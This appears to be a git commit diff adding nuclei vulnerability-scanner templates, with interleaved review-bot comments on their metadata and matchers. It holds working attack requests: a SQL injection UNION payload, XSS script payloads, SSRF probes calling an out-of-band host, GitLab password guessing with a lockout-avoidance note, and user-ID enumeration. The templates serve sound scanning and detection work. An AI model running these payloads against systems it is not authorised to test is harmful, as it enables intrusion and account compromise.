Merge branch 'master' of https://github.com/projectdiscovery/nuclei-templates
commit
bb6fa66dd9
10
README.md
10
README.md
|
@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc
|
|||
|
||||
| Templates | Counts | Templates | Counts | Templates | Counts |
|
||||
| ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- |
|
||||
| cves | 344 | vulnerabilities | 183 | exposed-panels | 150 |
|
||||
| takeovers | 67 | exposures | 107 | technologies | 103 |
|
||||
| misconfiguration | 68 | workflows | 32 | miscellaneous | 24 |
|
||||
| default-logins | 30 | file | 42 | dns | 10 |
|
||||
| cves | 349 | vulnerabilities | 184 | exposed-panels | 150 |
|
||||
| takeovers | 67 | exposures | 107 | technologies | 105 |
|
||||
| misconfiguration | 70 | workflows | 32 | miscellaneous | 24 |
|
||||
| default-logins | 31 | file | 42 | dns | 10 |
|
||||
| fuzzing | 10 | helpers | 9 | iot | 13 |
|
||||
|
||||
**118 directories, 1298 files**.
|
||||
**119 directories, 1311 files**.
|
||||
|
||||
</td>
|
||||
</tr>
|
||||
|
|
|
@ -0,0 +1,24 @@
|
|||
id: CVE-2017-15944
|
||||
|
||||
info:
|
||||
name: PreAuth RCE on Palo Alto GlobalProtect
|
||||
author: emadshanab
|
||||
reference: http://blog.orange.tw/2019/07/attacking-ssl-vpn-part-1-preauth-rce-on-palo-alto.html
|
||||
severity: high
|
||||
tags: cve,cve2017,rce,vpn,paloalto
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/global-protect/portal/css/login.css"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "Last-Modified: Sun, 10 Sep 2017 16:48:23 GMT"
|
||||
part: header
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
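Review bot: The template has no `description`, and its only positive signal is the exact `Last-Modified: Sun, 10 Sep 2017 16:48:23 GMT` header on login.css (L120), so a reader cannot tell that this is a static-asset timestamp fingerprint rather than a confirmation of the pre-auth RCE; add `description: Fingerprints a GlobalProtect portal build via the Last-Modified header of login.css; it does not verify exploitability.` Header names are case-insensitive and are lowercased on HTTP/2, so if the word matcher is case-sensitive (as it appears to be here) the `Last-Modified:` check can miss otherwise identical responses; a regex matcher with `(?i)` on `part: header` would be more robust. The `reference` at L83 is an `http://` link while the rest of the commit uses `https://`.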
|
|
@ -0,0 +1,22 @@
|
|||
id: CVE-2018-17254
|
||||
|
||||
info:
|
||||
name: Joomla JCK Editor SQL Injection
|
||||
author: Suman_Kar
|
||||
description: The JCK Editor component 6.4.4 for Joomla! allows SQL Injection via the jtreelink/dialogs/links.php parent parameter.
|
||||
severity: high
|
||||
tags: joomla,sqli,cve,cve2018
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
GET /plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php?extension=menu&view=menu&parent="%20UNION%20SELECT%20NULL,NULL,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION(),0x6e75636c65692d74656d706c617465),NULL,NULL,NULL,NULL,NULL--%20aa HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0
|
||||
Referer: {{BaseURL}}
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "nuclei-template"
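Review bot: `info` (L145-L160) has no `reference` entry, unlike every other CVE template in this commit, so the version claim in the description is not traceable; add `reference: https://nvd.nist.gov/vuln/detail/CVE-2018-17254`. The body match on `nuclei-template` (L200) works only because the hex literal in the request decodes to exactly that string, which is worth stating next to the matcher, e.g. `# 0x6e75636c65692d74656d706c617465 is "nuclei-template"; a reflected, un-decoded query string will not match`. Without that comment the next maintainer can change either side and silently break the pairing.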
|
|
@ -11,9 +11,10 @@ requests:
|
|||
- method: POST
|
||||
path:
|
||||
- "{{BaseURL}}/wp-admin/admin.php"
|
||||
body: 'icl_post_action=save_theme_localization&locale_file_name_en=EN\"><html xmlns=\"hacked'
|
||||
body: 'icl_post_action=save_theme_localization&locale_file_name_en=EN"><script>alert(0);</script>'
|
||||
redirects: true
|
||||
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'status_code==302 && contains(set_cookie, "_icl_current_admin_language")'
|
||||
- 'contains(tolower(all_headers), "text/html") && contains(set_cookie, "_icl_current_admin_language") && contains(body, "\"><script>alert(0);</script>")'
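Review bot: The new body (L218) and the DSL at L238 use the fixed marker `alert(0)`, so any page that already contains that literal, or a block page that echoes the request, satisfies `contains(body, ...)` and reports a finding; CVE-2020-25495 in this same commit uses `{{randstr}}` for the same purpose, and the marker here should follow that pattern in both the body and the DSL. If the `status_code==302` line at L235 stays on the new side, note that `redirects: true` (L221) makes the status that of the final response, so that entry may rarely be reachable. The `requests` entry begins before this hunk (the header shows it starts at line 11).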
|
||||
|
|
|
@ -0,0 +1,30 @@
|
|||
id: CVE-2020-25495
|
||||
|
||||
info:
|
||||
name: SCO Openserver 5.0.7 - 'section' Reflected XSS
|
||||
author: 0x_Akoko
|
||||
description: A reflected Cross-site scripting (XSS) vulnerability in Xinuo (formerly SCO) Openserver version 5 and 6 allows remote attackers to inject arbitrary web script or HTML tag via the parameter 'section'.
|
||||
severity: medium
|
||||
tags: cve,cve2020,sco,xss
|
||||
reference: https://www.exploit-db.com/exploits/49300
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/cgi-bin/manlist?section=%22%3E%3Ch1%3Ehello%3C%2Fh1%3E%3Cscript%3Ealert(/{{randstr}}/)%3C%2Fscript%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "<h1>hello</h1><script>alert(/{{randstr}}/)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "text/html"
|
||||
part: header
|
|
@ -5,7 +5,7 @@ info:
|
|||
author: luci
|
||||
severity: critical
|
||||
description: A malicious actor with network access to the vRealize Operations Manager API can perform a Server Side Request Forgery attack to steal administrative credentials or trigger Remote Code Execution using CVE-2021-21983.
|
||||
tags: cve,cve2021,ssrf,vmware
|
||||
tags: cve,cve2021,ssrf,vmware,vrealize
|
||||
reference: https://www.vmware.com/security/advisories/VMSA-2021-0004.html
|
||||
|
||||
requests:
|
||||
|
|
|
@ -0,0 +1,30 @@
|
|||
id: CVE-2021-22214
|
||||
|
||||
info:
|
||||
author: Suman_Kar
|
||||
name: Unauthenticated Gitlab SSRF - CI Lint API
|
||||
severity: medium
|
||||
description: When requests to the internal network for webhooks are enabled, a server-side request forgery vulnerability in GitLab CE/EE affecting all versions starting from 10.5 was possible to exploit for an unauthenticated attacker even on a GitLab instance where registration is limited.
|
||||
reference: |
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-22214
|
||||
- https://vin01.github.io/piptagole/gitlab/ssrf/security/2021/06/15/gitlab-ssrf.html
|
||||
- https://docs.gitlab.com/ee/api/lint.html
|
||||
tags: cve,cve2021,gitlab,ssrf,oob
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /api/v4/ci/lint?include_merged_yaml=true HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0
|
||||
Referer: {{BaseURL}}
|
||||
content-type: application/json
|
||||
Connection: close
|
||||
|
||||
{"content": "include:\n remote: http://{{interactsh-url}}/api/v1/targets?test.yml"}
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
part: interactsh_protocol # Confirms the DNS Interaction
|
||||
words:
|
||||
- "dns"
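Review bot: `reference: |` (L384) turns the three `- https://...` lines into one literal multi-line string, dash prefixes included, rather than a YAML sequence; a plain list under `reference:` (or a single URL string as the other templates in this commit use) is the unambiguous form, and detect-sentry (L1490) has the same construct. The matcher accepts only `dns` on `interactsh_protocol` (L441-L447), which may be satisfied by name resolution alone and is therefore weaker evidence of an outbound fetch than an `http` interaction; the inline comment should say why DNS was chosen, e.g. `# DNS-only: the include fetch may be blocked by egress policy, but resolution still shows the remote URL was processed`. ssrf-via-oauth-misconfig (L933) uses the same DNS-only check.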
|
|
@ -0,0 +1,30 @@
|
|||
id: CVE-2021-28854
|
||||
|
||||
info:
|
||||
name: VICIdial - Multiple sensitive Information disclosure
|
||||
author: pdteam
|
||||
severity: high
|
||||
description: VICIdial's Web Client contains many sensitive files that can be access from the client side. These files contain mysqli logs, auth logs, debug information, successful and unsuccessful login attempts with their corresponding IP's, User-Agents, credentials and much more. This information can be leveraged by an attacker to gain further access to VICIdial systems. This vulnerability affects all versions as of 20/5/21
|
||||
reference: https://github.com/JHHAX/VICIdial
|
||||
tags: cve,cve2021
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/agc/vicidial_mysqli_errors.txt"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- 'text/plain'
|
||||
part: header
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- 'vdc_db_query'
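Review bot: The description at L470 claims "many sensitive files", but the template requests only `/agc/vicidial_mysqli_errors.txt` (L490); scope the text to what is actually checked, e.g. `description: VICIdial's web client serves /agc/vicidial_mysqli_errors.txt without authentication, exposing MySQL error logs.` `tags: cve,cve2021` (L476) carries no product or class tag, unlike the other templates here; `tags: cve,cve2021,vicidial,disclosure` would let tag filters find it. The same description has a grammar slip ("can be access") and the ambiguous date `20/5/21`, which reads unambiguously as 2021-05-20.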
|
||||
part: body
|
|
@ -0,0 +1,55 @@
|
|||
id: gitlab-weak-login
|
||||
info:
|
||||
name: Gitlab Weak Login
|
||||
author: Suman_Kar
|
||||
severity: high
|
||||
tags: gitlab,default-login
|
||||
|
||||
# Gitlab blocks for 10 minutes after 5 "Invalid" attempts for valid user.
|
||||
# So make sure, not to attempt more than 4 password for same valid user.
|
||||
|
||||
requests:
|
||||
|
||||
- payloads:
|
||||
|
||||
gitlab_password:
|
||||
- 12345
|
||||
- 123456789
|
||||
gitlab_user:
|
||||
- 1234
|
||||
- admin
|
||||
# Enumerate valid user.
|
||||
|
||||
attack: clusterbomb
|
||||
|
||||
raw:
|
||||
- |
|
||||
POST /oauth/token HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0
|
||||
Accept: application/json, text/plain, */*
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Referer: {{BaseURL}}
|
||||
content-type: application/json
|
||||
Connection: close
|
||||
|
||||
{"grant_type":"password","username":"§gitlab_user§","password":"§gitlab_password§"}
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- application/json
|
||||
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '"access_token":'
|
||||
- '"token_type":'
|
||||
- '"refresh_token":'
|
||||
condition: and
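Review bot: The payload values at L582, L585 and L591 (`- 12345`, `- 123456789`, `- 1234`) are unquoted and are therefore parsed as YAML integers, not strings; they happen to round-trip here, but a value with a leading zero such as `0123` would be read as a number (octal under YAML 1.1) and silently altered, so write them as `- "12345"` etc., matching the quoted words elsewhere in the file. The lockout comment at L561-L564 is the template's most important operational constraint but sits above `requests:`, while `# Enumerate valid user.` (L597) hangs after the `gitlab_user` list with no visible subject; place the lockout note next to `attack: clusterbomb` and reword L597 to say what it refers to. The `§gitlab_user§` placeholder style (L639) differs from the `{{uid}}` style used by gitlab-user-open-api (L1686) in the same commit; if the loader accepts both, pick one for the repository.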
|
|
@ -15,3 +15,9 @@ requests:
|
|||
words:
|
||||
- "<title>Grafana</title>"
|
||||
part: body
|
||||
extractors:
|
||||
- type: regex
|
||||
part: body
|
||||
group: 1
|
||||
regex:
|
||||
- 'Grafana ([v0-9.]+)'
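Review bot: The extractor regex at L723, `'Grafana ([v0-9.]+)'`, lets capture group 1 begin with `v` and end with a trailing `.`, so a footer such as `Grafana v7.5.1.` yields `v7.5.1.` rather than a clean version; `'Grafana v?([0-9]+(?:\.[0-9]+)+)'` keeps the prefix out of the group and requires a dotted number. The enclosing request starts before this hunk (the header shows line 15), so the matcher it pairs with cannot be reviewed here.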
|
||||
|
|
|
@ -0,0 +1,24 @@
|
|||
id: extract-urls
|
||||
|
||||
info:
|
||||
name: Extract URLs from HTML attributes
|
||||
author: dwisiswant0
|
||||
severity: info
|
||||
tags: headless,extractor
|
||||
|
||||
headless:
|
||||
- steps:
|
||||
- args:
|
||||
url: "{{BaseURL}}"
|
||||
action: navigate
|
||||
- action: waitload
|
||||
- action: script
|
||||
name: extract
|
||||
args:
|
||||
code: |
|
||||
'\n' + [...new Set(Array.from(document.querySelectorAll('[src], [href], [url], [action]')).map(i => i.src || i.href || i.url || i.action))].join('\r\n') + '\n'
|
||||
extractors:
|
||||
- type: kval
|
||||
part: extract
|
||||
kval:
|
||||
- extract
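Review bot: In the script at L784, `i.url` reads a DOM property that standard elements do not have, so every node selected by `[url]` contributes `undefined` (an empty line after `join`) unless it also carries `src`, `href` or `action`; read the attribute instead, `i.src || i.href || i.getAttribute('url') || i.action`, or use `getAttribute` for all four if the raw attribute text is wanted. The `src`/`href`/`action` properties return URLs resolved against the page, which differs from the attribute text; a short comment above `code:` stating which form the extractor is meant to collect would keep the next edit from changing it. Elements whose attribute is present but empty appear to fall through to `undefined` as well and surface as blank lines.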
|
|
@ -30,3 +30,4 @@ requests:
|
|||
words:
|
||||
- '"success":true'
|
||||
- 'rep:password'
|
||||
condition: and
|
|
@ -28,4 +28,5 @@ requests:
|
|||
- type: word
|
||||
words:
|
||||
- '"success":true'
|
||||
- 'jcr:uuid'
|
||||
- 'jcr:uuid'
|
||||
condition: and
|
|
@ -0,0 +1,35 @@
|
|||
id: ssrf-via-oauth-misconfig
|
||||
|
||||
info:
|
||||
name: SSRF due to misconfiguration in OAuth
|
||||
author: KabirSuda
|
||||
severity: medium
|
||||
description: Sends a POST request with the endpoint "/connect/register" to check external Interaction with multiple POST parameters.
|
||||
tags: misconfig,oob,oauth
|
||||
reference: https://portswigger.net/research/hidden-oauth-attack-vectors
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /connect/register HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/json
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
|
||||
Accept-Language: en-US,en;q=0.9
|
||||
Connection: close
|
||||
|
||||
{
|
||||
"application_type": "web",
|
||||
"redirect_uris": ["https://{{interactsh-url}}/callback"],
|
||||
"client_name": "{{Hostname}}",
|
||||
"logo_uri": "https://{{interactsh-url}}/favicon.ico",
|
||||
"subject_type": "pairwise",
|
||||
"token_endpoint_auth_method": "client_secret_basic",
|
||||
"request_uris": ["https://{{interactsh-url}}"]
|
||||
}
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
part: interactsh_protocol # Confirms the DNS Interaction
|
||||
words:
|
||||
- "dns"
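Review bot: The `description` at L858 describes the request the template sends ("Sends a POST request with the endpoint ...") rather than the weakness it detects, so reports will not explain the finding; replace it with `description: The OAuth dynamic client registration endpoint (/connect/register) accepts client-supplied URLs (logo_uri, request_uris, redirect_uris) and contacts them server-side, which this template confirms through the out-of-band interaction.` The DNS-only `interactsh_protocol` check at L933 is the same construct discussed at CVE-2021-22214.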
|
|
@ -0,0 +1,31 @@
|
|||
id: zhiyuan-oa-unauthorized
|
||||
|
||||
info:
|
||||
name: Zhiyuan Oa Unauthorized
|
||||
author: pikpikcu
|
||||
severity: low
|
||||
reference: https://buaq.net/go-53721.html
|
||||
tags: seeyon,unauth
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/seeyon/personalBind.do.jpg/..;/ajax.do?method=ajaxAction&managerName=mMOneProfileManager&managerMethod=getOAProfile"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "serverIdentifier"
|
||||
- "companyName"
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "application/json"
|
||||
part: header
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
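Review bot: `info` (L950-L965) has no `description`, so nothing states what the unauthenticated `getOAProfile` call at L979 exposes; add `description: The Seeyon/Zhiyuan OA ajax.do endpoint returns OA profile data such as serverIdentifier and companyName without authentication.` The `name` at L953 reads `Zhiyuan Oa Unauthorized` while the tags say `seeyon`; `Seeyon Zhiyuan OA - Unauthenticated Profile Disclosure` makes both product names searchable and capitalises `OA`. The lone `https://buaq.net/go-53721.html` reference (L962) is an aggregator redirect; a primary write-up would be more durable.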
|
|
@ -0,0 +1,145 @@
|
|||
id: openssh-username-enumeration
|
||||
|
||||
info:
|
||||
name: OpenSSH 2.3 < 7.7 Detection
|
||||
author: r3dg33k
|
||||
severity: medium
|
||||
tags: network,openssh
|
||||
description: OpenSSH 2.3 < 7.7 is vulnerable to username enumeration
|
||||
reference: https://nvd.nist.gov/vuln/detail/CVE-2018-15473
|
||||
|
||||
network:
|
||||
- host:
|
||||
- "{{Hostname}}"
|
||||
- "{{Hostname}}:22"
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "SSH-2.0-OpenSSH_7.6"
|
||||
- "SSH-2.0-OpenSSH_7.6p1"
|
||||
- "SSH-2.0-OpenSSH_7.5"
|
||||
- "SSH-2.0-OpenSSH_7.5p1"
|
||||
- "SSH-2.0-OpenSSH_7.4"
|
||||
- "SSH-2.0-OpenSSH_7.4p1"
|
||||
- "SSH-2.0-OpenSSH_7.3"
|
||||
- "SSH-2.0-OpenSSH_7.3p1"
|
||||
- "SSH-2.0-OpenSSH_7.2p2"
|
||||
- "SSH-2.0-OpenSSH_7.2"
|
||||
- "SSH-2.0-OpenSSH_7.2p1"
|
||||
- "SSH-2.0-OpenSSH_7.1p2"
|
||||
- "SSH-2.0-OpenSSH_7.1"
|
||||
- "SSH-2.0-OpenSSH_7.1p1"
|
||||
- "SSH-2.0-OpenSSH_7.0"
|
||||
- "SSH-2.0-OpenSSH_7.0p1"
|
||||
- "SSH-2.0-OpenSSH_6.9"
|
||||
- "SSH-2.0-OpenSSH_6.9p1"
|
||||
- "SSH-2.0-OpenSSH_6.8"
|
||||
- "SSH-2.0-OpenSSH_6.8p1"
|
||||
- "SSH-2.0-OpenSSH_6.7"
|
||||
- "SSH-2.0-OpenSSH_6.7p1"
|
||||
- "SSH-2.0-OpenSSH_6.6"
|
||||
- "SSH-2.0-OpenSSH_6.6p1"
|
||||
- "SSH-2.0-OpenSSH_6.5"
|
||||
- "SSH-2.0-OpenSSH_6.5p1"
|
||||
- "SSH-2.0-OpenSSH_6.4"
|
||||
- "SSH-2.0-OpenSSH_6.4p1"
|
||||
- "SSH-2.0-OpenSSH_6.3"
|
||||
- "SSH-2.0-OpenSSH_6.3p1"
|
||||
- "SSH-2.0-OpenSSH_6.2p2"
|
||||
- "SSH-2.0-OpenSSH_6.2"
|
||||
- "SSH-2.0-OpenSSH_6.2p1"
|
||||
- "SSH-2.0-OpenSSH_6.1"
|
||||
- "SSH-2.0-OpenSSH_6.1p1"
|
||||
- "SSH-2.0-OpenSSH_6.0"
|
||||
- "SSH-2.0-OpenSSH_6.0p1"
|
||||
- "SSH-2.0-OpenSSH_5.9"
|
||||
- "SSH-2.0-OpenSSH_5.9p1"
|
||||
- "SSH-2.0-OpenSSH_5.8p2"
|
||||
- "SSH-2.0-OpenSSH_5.8"
|
||||
- "SSH-2.0-OpenSSH_5.8p1"
|
||||
- "SSH-2.0-OpenSSH_5.7"
|
||||
- "SSH-2.0-OpenSSH_5.7p1"
|
||||
- "SSH-2.0-OpenSSH_5.6"
|
||||
- "SSH-2.0-OpenSSH_5.6p1"
|
||||
- "SSH-2.0-OpenSSH_5.5"
|
||||
- "SSH-2.0-OpenSSH_5.5p1"
|
||||
- "SSH-2.0-OpenSSH_5.4"
|
||||
- "SSH-2.0-OpenSSH_5.4p1"
|
||||
- "SSH-2.0-OpenSSH_5.3"
|
||||
- "SSH-2.0-OpenSSH_5.3p1"
|
||||
- "SSH-2.0-OpenSSH_5.2"
|
||||
- "SSH-2.0-OpenSSH_5.2p1"
|
||||
- "SSH-2.0-OpenSSH_5.1"
|
||||
- "SSH-2.0-OpenSSH_5.1p1"
|
||||
- "SSH-2.0-OpenSSH_5.0"
|
||||
- "SSH-2.0-OpenSSH_5.0p1"
|
||||
- "SSH-2.0-OpenSSH_4.9"
|
||||
- "SSH-2.0-OpenSSH_4.9p1"
|
||||
- "SSH-2.0-OpenSSH_4.8"
|
||||
- "SSH-2.0-OpenSSH_4.8p1"
|
||||
- "SSH-2.0-OpenSSH_4.6"
|
||||
- "SSH-2.0-OpenSSH_4.6p1"
|
||||
- "SSH-2.0-OpenSSH_4.7"
|
||||
- "SSH-2.0-OpenSSH_4.7p1"
|
||||
- "SSH-2.0-OpenSSH_4.5"
|
||||
- "SSH-2.0-OpenSSH_4.5p1"
|
||||
- "SSH-2.0-OpenSSH_4.4"
|
||||
- "SSH-2.0-OpenSSH_4.4p1"
|
||||
- "SSH-2.0-OpenSSH_4.3p2"
|
||||
- "SSH-2.0-OpenSSH_4.3"
|
||||
- "SSH-2.0-OpenSSH_4.3p1"
|
||||
- "SSH-2.0-OpenSSH_4.2"
|
||||
- "SSH-2.0-OpenSSH_4.2p1"
|
||||
- "SSH-2.0-OpenSSH_4.1"
|
||||
- "SSH-2.0-OpenSSH_4.1p1"
|
||||
- "SSH-2.0-OpenSSH_4.0"
|
||||
- "SSH-2.0-OpenSSH_4.0p1"
|
||||
- "SSH-2.0-OpenSSH_3.9"
|
||||
- "SSH-2.0-OpenSSH_3.9p1"
|
||||
- "SSH-2.0-OpenSSH_3.8.1p1"
|
||||
- "SSH-2.0-OpenSSH_3.8"
|
||||
- "SSH-2.0-OpenSSH_3.8p1"
|
||||
- "SSH-2.0-OpenSSH_3.7.1p2"
|
||||
- "SSH-2.0-OpenSSH_3.7.1"
|
||||
- "SSH-2.0-OpenSSH_3.7.1p1"
|
||||
- "SSH-2.0-OpenSSH_3.7"
|
||||
- "SSH-2.0-OpenSSH_3.7p1"
|
||||
- "SSH-2.0-OpenSSH_3.6.1p2"
|
||||
- "SSH-2.0-OpenSSH_3.6.1"
|
||||
- "SSH-2.0-OpenSSH_3.6.1p1"
|
||||
- "SSH-2.0-OpenSSH_3.6"
|
||||
- "SSH-2.0-OpenSSH_3.6p1"
|
||||
- "SSH-2.0-OpenSSH_3.5"
|
||||
- "SSH-2.0-OpenSSH_3.5p1"
|
||||
- "SSH-2.0-OpenSSH_3.4"
|
||||
- "SSH-2.0-OpenSSH_3.4p1"
|
||||
- "SSH-2.0-OpenSSH_3.3"
|
||||
- "SSH-2.0-OpenSSH_3.3p1"
|
||||
- "SSH-2.0-OpenSSH_3.2.3"
|
||||
- "SSH-2.0-OpenSSH_3.2.3p1"
|
||||
- "SSH-2.0-OpenSSH_3.2.2"
|
||||
- "SSH-2.0-OpenSSH_3.2.2p1"
|
||||
- "SSH-2.0-OpenSSH_3.1"
|
||||
- "SSH-2.0-OpenSSH_3.1p1"
|
||||
- "SSH-2.0-OpenSSH_3.0.2"
|
||||
- "SSH-2.0-OpenSSH_3.0.2p1"
|
||||
- "SSH-2.0-OpenSSH_3.0p1"
|
||||
- "SSH-2.0-OpenSSH_3.0.1"
|
||||
- "SSH-2.0-OpenSSH_3.0.1p1"
|
||||
- "SSH-2.0-OpenSSH_3.0"
|
||||
- "SSH-2.0-OpenSSH_3.0p1"
|
||||
- "SSH-2.0-OpenSSH_2.9p2"
|
||||
- "SSH-2.0-OpenSSH_2.9.9"
|
||||
- "SSH-2.0-OpenSSH_2.9.9p1"
|
||||
- "SSH-2.0-OpenSSH_2.9"
|
||||
- "SSH-2.0-OpenSSH_2.9p1"
|
||||
- "SSH-2.0-OpenSSH_2.5.2p2"
|
||||
- "SSH-2.0-OpenSSH_2.5.1p2"
|
||||
- "SSH-2.0-OpenSSH_2.5.1p1"
|
||||
- "SSH-2.0-OpenSSH_2.3.0p1"
|
||||
- "SSH-2.0-OpenSSH_2.5.2p2"
|
||||
- "SSH-2.0-OpenSSH_2.5.1p2"
|
||||
- "SSH-2.0-OpenSSH_2.5.1p1"
|
||||
- "SSH-2.0-OpenSSH_2.3.0p1"
|
||||
- "SSH-2.0-OpenSSH_2.3"
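Review bot: The `words` list contains duplicates: `SSH-2.0-OpenSSH_3.0p1` appears at L1410 and L1422, and the four banners at L1440-L1449 (`2.5.2p2`, `2.5.1p2`, `2.5.1p1`, `2.3.0p1`) are repeated verbatim at L1452-L1461; drop the second copies. Because word matching is substring-based, `SSH-2.0-OpenSSH_7.6` already matches `OpenSSH_7.6p1`, so most `pN` variants are redundant, and conversely `SSH-2.0-OpenSSH_2.3` matches any `2.3.x` banner. Banner matching cannot see distribution backports (a `7.4p1` banner may belong to a patched build), so the description at L1055 should say the result is version-based, e.g. `description: Banner-based detection of OpenSSH 2.3 through 7.6, versions reported vulnerable to username enumeration (CVE-2018-15473); backported fixes are not visible in the banner.` `tags` (L1052) also omit `cve,cve2018` although the reference is a CVE.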
|
|
@ -0,0 +1,21 @@
|
|||
id: detect-sentry
|
||||
|
||||
info:
|
||||
name: Detect Sentry Instance
|
||||
author: Sicksec
|
||||
severity: info
|
||||
tags: ssrf,sentry,tech
|
||||
reference: |
|
||||
- https://hackerone.com/reports/374737
|
||||
- https://twitter.com/itsecurityguard/status/1127893545619218432?lang=en
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}"
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
part: body
|
||||
regex:
|
||||
- "https://[0-9a-f]*@[a-z0-9]+\\.[a-z.]+.?[0-9]+"
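Review bot: The regex at L1527 uses `.?` (any single optional character) where a Sentry DSN has a literal `/` between host and project id, so `"https://[0-9a-f]+@[a-z0-9]+\\.[a-z.]+/[0-9]+"` states the intent and avoids matching across an unrelated character; `[0-9a-f]*` also accepts an empty key, where `+` would not. `tags: ssrf,sentry,tech` (L1487) labels a `severity: info` extractor as an SSRF finding, which pulls it into SSRF-filtered runs and reports although it only extracts a DSN; `tags: sentry,tech` fits what the template does. `reference: |` (L1490) stores the two URLs as one literal string with `- ` prefixes rather than as a list, the same issue as in CVE-2021-22214.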
|
|
@ -0,0 +1,36 @@
|
|||
id: vmware-vrealize
|
||||
|
||||
info:
|
||||
name: VMware vRealize
|
||||
author: milo2012
|
||||
severity: info
|
||||
description: Version of VMware vRealize Operations Manager
|
||||
tags: vmware,vrealize
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/ui/login.action"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- text/html
|
||||
part: header
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- '<title>vRealize Operations Manager</title>'
|
||||
part: body
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
part: body
|
||||
group: 1
|
||||
regex:
|
||||
- "SessionProvider.js\\?version=([0-9.]+)"
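Review bot: The extractor regex at L1632, `SessionProvider.js\\?version=([0-9.]+)`, escapes the `?` but not the `.` in `SessionProvider.js`, so that dot matches any character; `"SessionProvider\\.js\\?version=([0-9.]+)"` is what is meant. `text/html` at L1595 is the only unquoted word in the file while every other entry is quoted; quoting it keeps the style uniform and guards against a future value that starts with a YAML indicator.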
|
|
@ -0,0 +1,42 @@
|
|||
id: gitlab-user-open-api
|
||||
|
||||
info:
|
||||
author: Suman_Kar
|
||||
name: GitLab - User Information Disclosure Via Open API
|
||||
severity: medium
|
||||
tags: gitlab,disclosure,fuzz
|
||||
reference: https://gitlab.com/gitlab-org/gitlab-foss/-/issues/40158
|
||||
|
||||
requests:
|
||||
- payloads:
|
||||
uid: helpers/wordlists/numbers.txt
|
||||
attack: sniper
|
||||
threads: 50
|
||||
|
||||
raw:
|
||||
- |
|
||||
GET /api/v4/users/{{uid}} HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Accept-Language: en-US,en;q=0.9
|
||||
Accept: application/json, text/plain, */*
|
||||
Referer: {{BaseURL}}
|
||||
Connection: keep-alive
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
part: body
|
||||
regex:
|
||||
- "username.*"
|
||||
- "id.*"
|
||||
- "name.*"
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "application/json"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
